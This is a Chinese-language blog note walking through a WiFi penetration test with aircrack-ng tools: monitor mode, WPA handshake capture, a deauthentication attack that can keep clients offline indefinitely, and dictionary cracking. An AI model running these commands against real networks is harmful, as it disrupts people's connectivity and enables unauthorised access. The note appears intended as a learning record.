前言
以前刚听说kali linux时就对渗透测试方面比较感兴趣,时隔几年再次拿起曾经的无线网卡(带监听功能),再次对局域网的wifi进行了一下渗透测试,遂简单记录一下,方便以后查阅使用
操作流程
假设已经安装了kali linux虚拟机,本文使用的是vmware,并购买了具有监听功能的无线网卡
1.查看网卡是否正确插入
iwconfig
2.启动网卡监听
airmon-ng start wlan0
3.扫描信号
airodump-ng wlan0mon
4.监听指定目标
airodump-ng wlan0mon -c 13 --bssid 76:0C:38:99:53:75 -w ~/handshake
-c后跟信道,即CH那列
5.解除认证攻击
新开一个窗口
aireplay-ng wlan0mon -0 1 -a 9A:09:E8:87:46:39 -c E0:DC:FF:D2:FF:C1
-0表示解除认证模式,俗称断网打击,后面跟发送数据包次数,设为0表示不限,除非按下Ctrl-c,不然目标会一直没有网络连接,-a后跟ap的MAC地址,-c跟目标地址,即上一个窗口扫描中出现的STATION一列。
当上一个扫描窗口中日期后面出现WPA handshake时表示抓到了握手包,如果还没有,可再次执行断网打击。
6.字典暴力破解
aircrack-ng -w pwd.txt *.cap
三丰这里测试了几次,热点使用随机MAC,所以这里选择第2个有握手包的地址,然后能不能破解就看字典了,这里三丰直接把弱密码250250250写进了字典里,最后破解成功示例如下图
本文仅作学习交流,请勿随意对你所在局域网进行扫描攻击!!!
遇到的问题
虚拟机无法联网,读取不了网卡,可以cmd中输入 services.msc 检查一下是否是vmware的相关服务未开启